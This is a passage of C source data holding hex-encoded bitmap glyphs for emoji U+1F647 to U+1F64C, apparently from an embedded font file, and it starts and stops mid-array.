0xe0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0xf, 0xf8, 0x0, 0x1f, 0xe0, 0x0, 0x0, 0x0,
0x0, 0xf, 0xff, 0xff, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xff, 0xf8, 0x0, 0x0, 0x0,
/* U+1F647 "🙇" */
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x70, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0x3,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc, 0x0,
0x0, 0x18, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x80, 0x0, 0xe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xc, 0x0, 0x0, 0x60, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x7,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80,
0x0, 0x38, 0x0, 0x0, 0x0, 0x0, 0x8, 0x0,
0xc, 0x0, 0x1, 0x80, 0x0, 0x80, 0x0, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x0,
0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0xff, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0xe0,
0x1, 0xff, 0xff, 0x0, 0xe, 0x0, 0x0, 0x0,
0x2, 0x0, 0x7f, 0x0, 0x7f, 0x0, 0x20, 0x0,
0x0, 0x0, 0x0, 0x7, 0x80, 0x0, 0x3c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0,
0x0, 0x70, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x6, 0x0, 0x0, 0x0,
0x0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x0,
0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x80, 0x0, 0x0, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x0, 0x1, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x1,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xc0, 0xc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x6, 0x0, 0xc0, 0x0, 0x7, 0xe0, 0x0,
0x3f, 0x0, 0x0, 0x18, 0xe, 0x0, 0x0, 0xff,
0x80, 0x3, 0xfe, 0x0, 0x0, 0xe0, 0xe0, 0x0,
0x6, 0xc, 0x0, 0x18, 0x30, 0x0, 0x3, 0x86,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xc, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x73, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0x98, 0x0, 0x0, 0x1f,
0x0, 0x0, 0x7c, 0x0, 0x0, 0xd, 0x80, 0x0,
0x1, 0xfc, 0x0, 0x7, 0xf0, 0x0, 0x0, 0x3c,
0x1, 0x80, 0xf, 0xe0, 0x0, 0x3f, 0x80, 0xc,
0x1, 0xe0, 0xc, 0x0, 0x7f, 0x0, 0x1, 0xfc,
0x0, 0x60, 0xf, 0x0, 0x60, 0x1, 0xf0, 0x0,
0x7, 0xc0, 0x3, 0x0, 0x78, 0x3, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x18, 0x3, 0xc0, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x1e,
0x0, 0x7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7c,
0x0, 0xf0, 0x1, 0xff, 0xc0, 0x0, 0x0, 0x1,
0xff, 0xc0, 0xe, 0xc0, 0x3, 0xff, 0xe0, 0x0,
0x0, 0xff, 0xf8, 0x0, 0x66, 0x0, 0x1, 0xff,
0xe0, 0x0, 0x3f, 0xfc, 0x0, 0x3, 0x18, 0x0,
0x0, 0x1f, 0x80, 0x3, 0xf0, 0x0, 0x0, 0x30,
0xe0, 0x0, 0x0, 0x1e, 0x0, 0x3c, 0x0, 0x0,
0x3, 0x83, 0x80, 0x0, 0x0, 0x38, 0x3, 0x80,
0x0, 0x0, 0x38, 0xe, 0x0, 0x0, 0x0, 0xe0,
0x18, 0x0, 0x0, 0x3, 0x80, 0x3c, 0x0, 0x0,
0x7, 0xff, 0xc0, 0x0, 0x0, 0x78, 0x0, 0xfc,
0x0, 0x0, 0x7f, 0xff, 0x0, 0x0, 0x1f, 0x80,
0x1, 0xff, 0xff, 0xff, 0x0, 0x1f, 0xff, 0xff,
0xf0, 0x0, 0x0, 0xff, 0xff, 0xf0, 0x0, 0x7f,
0xff, 0xf8, 0x0, 0x0,
/* U+1F648 "🙈" */
0x0, 0x0, 0x0, 0x0, 0x7f, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xff, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0,
0x3, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf8, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe, 0x0, 0x0, 0x3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x1, 0xe0, 0x0, 0x0, 0xf, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x60, 0x0, 0x0, 0x0, 0xc, 0x0, 0x0,
0x0, 0x0, 0x1, 0x80, 0x0, 0x0, 0x0, 0xe0,
0x70, 0x0, 0x0, 0x3c, 0xe, 0x0, 0x0, 0x0,
0x6, 0x1f, 0xfe, 0x0, 0x3f, 0xf8, 0x30, 0x0,
0x0, 0x0, 0x71, 0xff, 0xfe, 0xf, 0xff, 0xf1,
0xc0, 0x0, 0x0, 0x3, 0x3e, 0x3f, 0xff, 0xff,
0xc7, 0xc6, 0x0, 0x0, 0x0, 0x3b, 0xc1, 0xff,
0xff, 0xff, 0xf, 0x38, 0x0, 0x0, 0x1, 0xbc,
0x3f, 0xfc, 0x3f, 0xfc, 0x3c, 0xc0, 0x0, 0x0,
0xf, 0xc1, 0xe0, 0xf3, 0xc1, 0xe0, 0xf6, 0x0,
0x0, 0x7, 0xfc, 0x0, 0x3, 0x9c, 0x0, 0x3,
0xfe, 0x0, 0x0, 0xff, 0xc0, 0x0, 0xf, 0xc0,
0x0, 0xf, 0xfc, 0x0, 0xf, 0x1c, 0x0, 0x0,
0x7e, 0x0, 0x0, 0x3c, 0xf8, 0x0, 0xe1, 0xe0,
0x0, 0x1, 0xf0, 0x0, 0x0, 0xf1, 0xc0, 0xe,
0x1e, 0x0, 0x0, 0xf, 0x80, 0x0, 0x3, 0xc7,
0x0, 0x71, 0xe0, 0x0, 0x0, 0xfc, 0x0, 0x0,
0xe, 0x38, 0x7, 0xe, 0x0, 0x0, 0x7, 0xe0,
0x0, 0x0, 0x78, 0xe0, 0x38, 0xe0, 0x0, 0x0,
0x37, 0x0, 0x0, 0x1, 0xe7, 0x1, 0xcf, 0x0,
0x0, 0x3, 0x9c, 0x0, 0x0, 0x7, 0xb8, 0xe,
0xf0, 0x0, 0x0, 0x38, 0x70, 0x0, 0x0, 0x1f,
0xc0, 0x7f, 0x0, 0x0, 0x7, 0x81, 0xe0, 0x0,
0x0, 0xfe, 0x3, 0xf8, 0x0, 0x1, 0xf9, 0xe7,
0xe0, 0x0, 0x3, 0xf0, 0xf, 0x80, 0x0, 0x7f,
0xf, 0xf, 0xe0, 0x0, 0xf, 0x0, 0x78, 0x0,
0x1f, 0xe0, 0x30, 0x1f, 0xe0, 0x0, 0x38, 0x3,
0x80, 0x3, 0xf8, 0x0, 0x0, 0x1f, 0xe0, 0x1,
0xe0, 0x3c, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x1f,
0xc0, 0x7, 0x81, 0xc0, 0xf, 0xc0, 0xf, 0xff,
0x0, 0x1f, 0x80, 0x1c, 0x1e, 0x1, 0xfe, 0x3,
0xff, 0xff, 0x0, 0xff, 0x0, 0xf0, 0xe0, 0x1f,
0x70, 0x3f, 0xff, 0xfc, 0x7, 0x7c, 0x3, 0x8f,
0x3, 0xe3, 0x81, 0xff, 0xff, 0xe0, 0x38, 0xf8,
0x1e, 0x70, 0x3f, 0x1e, 0x7, 0xff, 0xfe, 0x3,
0xc7, 0xe0, 0x73, 0x81, 0xf8, 0x70, 0x1f, 0xff,
0xe0, 0x1c, 0x3f, 0x3, 0xbc, 0x1e, 0xe3, 0xc0,
0xf, 0xf0, 0x1, 0xe3, 0xbc, 0x1d, 0xc0, 0xe3,
0xf, 0x0, 0x0, 0x0, 0x1e, 0x18, 0xe0, 0x7e,
0xe, 0x1c, 0x3c, 0x0, 0x0, 0x3, 0xe1, 0xc3,
0x83, 0xf0, 0x70, 0x70, 0x7c, 0x0, 0x0, 0x7c,
0x1c, 0x1c, 0x1f, 0x83, 0x81, 0xc1, 0xfe, 0x0,
0x3f, 0xc1, 0xc0, 0xe0, 0xfc, 0x1c, 0x7, 0x1,
0xff, 0xff, 0xf0, 0x1c, 0x7, 0x7, 0xe0, 0xe0,
0x7e, 0x0, 0xff, 0xf8, 0x3, 0xf0, 0x38, 0x3f,
0x3, 0x87, 0xfc, 0x0, 0x0, 0x0, 0x7b, 0xc3,
0x81, 0xf8, 0x1f, 0xf8, 0xf8, 0x0, 0x0, 0xf,
0x8f, 0xfc, 0xf, 0xc0, 0x3f, 0x1, 0xfe, 0x0,
0xf, 0xf0, 0x1f, 0x80, 0x77, 0x0, 0x0, 0x7,
0xff, 0xff, 0xfe, 0x0, 0x0, 0x7, 0x38, 0x0,
0x0, 0x70, 0xff, 0xfc, 0x38, 0x0, 0x0, 0x39,
0xc0, 0x0, 0x3, 0x80, 0x0, 0x1, 0xc0, 0x0,
0x3, 0xc7, 0x0, 0x0, 0x38, 0x0, 0x0, 0x7,
0x0, 0x0, 0x1c, 0x3c, 0x0, 0x3, 0x80, 0x0,
0x0, 0x1c, 0x0, 0x1, 0xc0, 0xf0, 0x0, 0x38,
0x0, 0x0, 0x0, 0x78, 0x0, 0x1e, 0x3, 0xc0,
0x7, 0x80, 0x0, 0x0, 0x1, 0xe0, 0x1, 0xe0,
0xf, 0x80, 0xf0, 0x0, 0x0, 0x0, 0x3, 0xe0,
0x3e, 0x0, 0x1f, 0xff, 0x0, 0x0, 0x0, 0x0,
0x7, 0xff, 0xc0, 0x0, 0x3f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xf0, 0x0,
/* U+1F649 "🙉" */
0x0, 0x0, 0x0, 0x0, 0x7f, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xff, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0x80,
0x1f, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0x80, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x78, 0x0, 0x0, 0x0,
0x0, 0x0, 0x78, 0x0, 0x0, 0x1, 0xe0, 0x0,
0x0, 0x0, 0x0, 0xf, 0x0, 0x0, 0x0, 0xf,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0,
0x0, 0x78, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0,
0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x0, 0x1e, 0x0, 0x0, 0x0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x7e, 0x0, 0x7,
0xe0, 0x38, 0x0, 0x0, 0x0, 0x38, 0x1f, 0xf8,
0x1, 0xff, 0x81, 0x80, 0x0, 0x0, 0x3, 0x3,
0xc3, 0xe0, 0x7c, 0x3c, 0x1c, 0x0, 0x0, 0x0,
0x70, 0x70, 0xf, 0xff, 0x0, 0xe0, 0xe0, 0x0,
0x0, 0x6, 0xe, 0x0, 0x3f, 0xc0, 0x7, 0xe,
0x0, 0x0, 0x3, 0xe0, 0xe0, 0x0, 0xf0, 0x0,
0x70, 0x7e, 0x0, 0x0, 0xff, 0xe, 0x0, 0x0,
0x0, 0x3, 0xf, 0xf0, 0x0, 0x1c, 0x38, 0xe0,
0x0, 0x0, 0x0, 0x39, 0xe3, 0x80, 0x3, 0x83,
0x8e, 0x0, 0x0, 0x0, 0x3, 0x9c, 0x1c, 0x0,
0x70, 0x38, 0xe0, 0x60, 0x0, 0x60, 0x71, 0xc0,
0xe0, 0x7, 0x3, 0x8e, 0xf, 0x0, 0xf, 0x7,
0x1c, 0xe, 0x0, 0x60, 0x38, 0xe1, 0xf8, 0x1,
0xf8, 0x71, 0xc0, 0x60, 0xe, 0x7, 0x7, 0x1f,
0x80, 0x1f, 0x87, 0xe, 0x7, 0x0, 0xe0, 0x70,
0x71, 0xf8, 0x1, 0xf8, 0xe0, 0xe0, 0x70, 0xe,
0x7, 0x7, 0x1f, 0x80, 0x1f, 0x8e, 0xe, 0x7,
0x0, 0xe0, 0x70, 0x70, 0xf0, 0x0, 0xf0, 0xe0,
0xe0, 0x70, 0xe, 0x7, 0x7, 0x0, 0x0, 0x0,
0xe, 0xe, 0x7, 0x0, 0xe0, 0x70, 0x70, 0x0,
0xf8, 0x0, 0xe0, 0xe0, 0x70, 0x7, 0x3, 0x87,
0x0, 0xf, 0x80, 0xf, 0xc, 0xe, 0x0, 0x70,
0x38, 0xe0, 0x0, 0x70, 0x0, 0x71, 0xc0, 0xe0,
0x7, 0x3, 0x8e, 0x0, 0x0, 0x0, 0x7, 0x1c,
0xe, 0x0, 0x70, 0x39, 0xe0, 0x0, 0x0, 0x0,
0x39, 0xc0, 0xe0, 0x7, 0x3, 0x9c, 0x0, 0x0,
0x0, 0x3, 0x9c, 0x6, 0x0, 0xe0, 0x39, 0xc0,
0xf, 0xff, 0x0, 0x39, 0xc0, 0x70, 0xe, 0x3,
0x9c, 0x7, 0xff, 0xfe, 0x3, 0x9e, 0x7, 0x1,
0xe0, 0x71, 0xc0, 0xff, 0xff, 0xf0, 0x38, 0xe0,
0x30, 0x1c, 0xf, 0x1c, 0xf, 0xff, 0xff, 0x3,
0x8f, 0x3, 0x83, 0xc0, 0xe0, 0xe0, 0x7f, 0xff,
0xe0, 0x38, 0x78, 0x18, 0x38, 0x1e, 0xe, 0x1,
0xff, 0xf8, 0x7, 0x7, 0x81, 0xc3, 0x83, 0xe0,
0x70, 0x3, 0xfc, 0x0, 0xf0, 0x7c, 0x1c, 0x70,
0x37, 0x7, 0x80, 0x0, 0x0, 0x1e, 0xd, 0xe0,
0xe7, 0x7, 0x30, 0x1e, 0x0, 0x0, 0x3, 0xc0,
0xce, 0xe, 0x70, 0x63, 0x80, 0xf8, 0x0, 0x1,
0xf0, 0x18, 0xf0, 0xee, 0x6, 0x1c, 0x3, 0xf8,
0x0, 0xfe, 0x3, 0x87, 0x6, 0xe0, 0xe0, 0xe0,
0xf, 0xff, 0xff, 0x0, 0x70, 0x70, 0x7e, 0xe,
0x7, 0x0, 0xf, 0xff, 0x0, 0xe, 0x7, 0x7,
0xe0, 0xe0, 0x78, 0x0, 0x0, 0x0, 0x1, 0xe0,
0x70, 0x7e, 0x7, 0xf, 0xe0, 0x0, 0x0, 0x0,
0x7f, 0xf, 0x7, 0xe0, 0x7f, 0xef, 0x80, 0x0,
0x0, 0x1e, 0x7f, 0xe0, 0x7e, 0x3, 0xfc, 0x3e,
0x0, 0x0, 0x7, 0xc3, 0xfc, 0x6, 0xe0, 0x1f,
0x80, 0xff, 0x0, 0xf, 0xf0, 0x1f, 0x80, 0x67,
0x0, 0x0, 0x7, 0xff, 0xff, 0xfe, 0x0, 0x0,
0xe, 0x70, 0x0, 0x0, 0x71, 0xff, 0xf0, 0xe0,
0x0, 0x0, 0xe3, 0x80, 0x0, 0xe, 0x0, 0x0,
0x7, 0x0, 0x0, 0x1c, 0x3c, 0x0, 0x1, 0xc0,
0x0, 0x0, 0x38, 0x0, 0x3, 0x81, 0xe0, 0x0,
0x78, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x78, 0xf,
0x0, 0xf, 0x0, 0x0, 0x0, 0xf, 0x0, 0xf,
0x0, 0x7e, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x7e,
0x3, 0xc0, 0x1, 0xff, 0xf8, 0x0, 0x0, 0x0,
0x1, 0xff, 0xf8, 0x0, 0x3, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x3, 0xfc, 0x0,
/* U+1F64A "🙊" */
0x0, 0x0, 0x0, 0x7, 0xfe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xff, 0xff, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x7e, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x0, 0x3c,
0x0, 0x0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0,
0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x3c, 0x0,
0x0, 0x0, 0xf, 0x0, 0x0, 0x0, 0x1, 0x80,
0x0, 0x0, 0x0, 0x18, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x0, 0xe, 0x0, 0x0,
0x0, 0xc0, 0x3e, 0x0, 0x3, 0xe0, 0x30, 0x0,
0x0, 0xe, 0x7, 0xfc, 0x0, 0x7f, 0xc1, 0xc0,
0x0, 0x0, 0xe0, 0x70, 0x78, 0xf, 0x7, 0x7,
0x0, 0x0, 0x6, 0x6, 0x1, 0xf1, 0xe0, 0x1c,
0x18, 0x0, 0x0, 0x70, 0x70, 0x3, 0xfe, 0x0,
0x70, 0xc0, 0x0, 0x3, 0x83, 0x0, 0x7, 0xc0,
0x1, 0x87, 0x0, 0x0, 0x18, 0x18, 0x0, 0x0,
0x0, 0xc, 0x18, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x60, 0xe0, 0x0, 0x7e, 0x6, 0x0,
0x0, 0x0, 0x3, 0x7, 0xe0, 0xf, 0xe0, 0x30,
0x30, 0x0, 0x18, 0x18, 0x1f, 0xc0, 0xf0, 0x1,
0x83, 0xc0, 0x1, 0xe0, 0xc0, 0xf, 0xe, 0x0,
0xc, 0x3f, 0x0, 0x1f, 0x86, 0x0, 0x1c, 0x60,
0x0, 0x71, 0xf8, 0x0, 0xfc, 0x70, 0x0, 0x77,
0xe, 0x3, 0x8f, 0xc0, 0x7, 0xe3, 0x1, 0xc1,
0xb0, 0xf0, 0xc, 0x7e, 0x0, 0x3f, 0x18, 0xf,
0xf, 0x8f, 0x80, 0x61, 0xe0, 0x0, 0xf0, 0xc0,
0x7c, 0x7c, 0x7c, 0x3, 0x0, 0x0, 0x0, 0x6,
0x3, 0xe3, 0xe3, 0xe0, 0x38, 0x0, 0x7c, 0x0,
0x30, 0x1f, 0x1f, 0xf, 0x1, 0xc0, 0x3, 0xe0,
0x1, 0xc0, 0xf0, 0xfc, 0x38, 0xc, 0x0, 0x4,
0x0, 0x6, 0x7, 0x6, 0x60, 0x0, 0x60, 0xf,
0x80, 0x0, 0x30, 0x0, 0x73, 0x80, 0x6, 0x1,
0xfe, 0x1f, 0x1, 0xc0, 0x7, 0xf, 0x0, 0x30,
0x3f, 0x73, 0xfe, 0x6, 0x0, 0x70, 0x3f, 0x81,
0x83, 0xe0, 0xfe, 0xf8, 0x30, 0x7f, 0x0, 0x7c,
0xc, 0x3c, 0x7, 0xf9, 0xe1, 0x83, 0xe0, 0x0,
0x70, 0x63, 0xc0, 0x0, 0xe3, 0x8c, 0x18, 0x0,
0x3, 0x83, 0xbc, 0x0, 0x3, 0x8e, 0xe0, 0xc0,
0x0, 0xc, 0xf, 0xc0, 0x0, 0xc, 0x3e, 0xc,
0x0, 0x0, 0x70, 0x7c, 0x0, 0x0, 0x70, 0xf0,
0x60, 0x0, 0x3, 0x83, 0xc0, 0x0, 0x3, 0x83,
0x87, 0x0, 0x0, 0xe, 0x3c, 0x0, 0x0, 0x1c,
0x1e, 0x30, 0x0, 0x0, 0x77, 0xc0, 0x0, 0x0,
0xe0, 0x7f, 0x80, 0x0, 0x1, 0xfc, 0x0, 0x0,
0x7, 0x0, 0xf8, 0x0, 0x0, 0xf, 0x80, 0x0,
0x0, 0x30, 0x3, 0xe0, 0x0, 0x1, 0xf0, 0x0,
0x0, 0x3, 0x80, 0x7, 0xc0, 0x0, 0x3e, 0x0,
0x0, 0x0, 0x18, 0x0, 0x1f, 0x80, 0x7, 0xe0,
0x0, 0x0, 0x1, 0xc0, 0x0, 0x3f, 0x0, 0x7c,
0x0, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x7c, 0x7,
0x80, 0x0, 0x0, 0xff, 0x80, 0x0, 0x0, 0xf0,
0x38, 0x0, 0x0, 0x7f, 0xff, 0x80, 0x0, 0x3,
0x83, 0x80, 0x0, 0xf, 0xc0, 0x1f, 0x0, 0x0,
0x1e, 0x1c, 0x0, 0x0, 0xff, 0xff, 0xfe, 0x0,
0x0, 0x70, 0xe0, 0x0, 0x1e, 0xff, 0xff, 0xbc,
0x0, 0x3, 0x87, 0x0, 0x3, 0xc0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x38, 0x0, 0x3c, 0x0, 0x0,
0x1, 0xc0, 0x0, 0xe1, 0xc0, 0x3, 0x80, 0x0,
0x0, 0x3, 0x80, 0xe, 0x7, 0x0, 0x78, 0x0,
0x0, 0x0, 0xf, 0x0, 0x70, 0x1c, 0xf, 0x0,
0x0, 0x0, 0x0, 0x1e, 0xf, 0x0, 0x7f, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x7f, 0xf0, 0x0, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x0,
/* U+1F64B "🙋" */
0x1, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xc1, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x3c, 0x7, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x18, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x0, 0xc0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x6, 0x0, 0x0, 0x0, 0x0, 0x6, 0x0,
0x30, 0x0, 0x0, 0x0, 0x0, 0x30, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x1, 0x80, 0x1f, 0x0, 0x0,
0x0, 0x0, 0xc, 0x0, 0x1c, 0x0, 0x0, 0x0,
0x0, 0x60, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x3,
0x0, 0x7, 0x0, 0x0, 0x0, 0x0, 0x18, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0xc0, 0xf, 0x80,
0x0, 0x0, 0x0, 0x6, 0x1, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x30, 0x1f, 0x0, 0x3f, 0xf0, 0x0,
0x1, 0x81, 0xe0, 0xf, 0xff, 0xf0, 0x0, 0x1c,
0xc, 0x1, 0xf0, 0x3, 0xf0, 0x0, 0xe0, 0x60,
0x3c, 0x0, 0x3, 0xc0, 0x7, 0x3, 0x3, 0x80,
0x0, 0x7, 0x80, 0x38, 0x18, 0x38, 0x0, 0x0,
0xe, 0x1, 0xc0, 0xc7, 0x0, 0x0, 0x0, 0x38,
0xe, 0x6, 0x30, 0x0, 0x0, 0x0, 0xe0, 0x70,
0x33, 0x1, 0x0, 0x0, 0x3, 0x83, 0x1, 0xb0,
0x1c, 0x0, 0x0, 0xc, 0x38, 0xf, 0x81, 0xf0,
0x0, 0x0, 0x71, 0xc0, 0x78, 0xf, 0x80, 0x0,
0x1, 0xce, 0x3, 0x80, 0x7c, 0x1, 0xc0, 0xe,
0x70, 0x1c, 0x3, 0xe0, 0x1f, 0x0, 0x33, 0x80,
0xc0, 0xe, 0x0, 0xf8, 0x1, 0xdc, 0x0, 0x0,
0x0, 0x7, 0xc0, 0xe, 0xe0, 0x0, 0x0, 0x0,
0x3e, 0x0, 0x37, 0x0, 0x0, 0x0, 0x0, 0xe0,
0x1, 0xb8, 0x0, 0x2, 0x0, 0x0, 0x0, 0xd,
0xc0, 0x0, 0x78, 0x0, 0x0, 0x0, 0x6e, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x3, 0x70, 0x0, 0x7,
0x80, 0x0, 0x0, 0x1b, 0x80, 0x0, 0x1f, 0x0,
0x0, 0x1, 0xdc, 0x0, 0x0, 0x3e, 0x1, 0x80,
0xe, 0x70, 0x0, 0x0, 0x7f, 0xfc, 0x0, 0x73,
0x80, 0x0, 0x0, 0x7f, 0xc0, 0x3, 0x9c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x38, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc7, 0x80, 0x0, 0x0, 0x0,
0x0, 0xe, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x7,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0, 0x0,
0x0, 0x0, 0xf, 0x3, 0x80, 0x0, 0x0, 0x0,
0x0, 0x38, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x70, 0x0, 0x0, 0x0, 0x0, 0x3, 0x83,
0x80, 0x0, 0x0, 0x0, 0x0, 0x1c, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x78, 0x0, 0x0,
0x0, 0x0, 0x7, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x30, 0x7, 0x80, 0x0, 0x0, 0x0, 0x3,
0x80, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0,
0x3c, 0x0, 0x0, 0x0, 0xf, 0x0, 0x0, 0xfc,
0x0, 0x0, 0x3, 0xf0, 0x0, 0x1, 0xfe, 0x0,
0x3, 0xfe, 0x0, 0x0, 0x1, 0xff, 0xff, 0xff,
0x80, 0x0, 0x0, 0x0, 0x7f, 0xff, 0x0, 0x0,
/* U+1F64C "🙌" */
0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0x80, 0x38, 0x1, 0x80, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x38, 0x3, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xc0, 0x38, 0x3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x1, 0xe0, 0x38, 0x7, 0x0, 0x0,
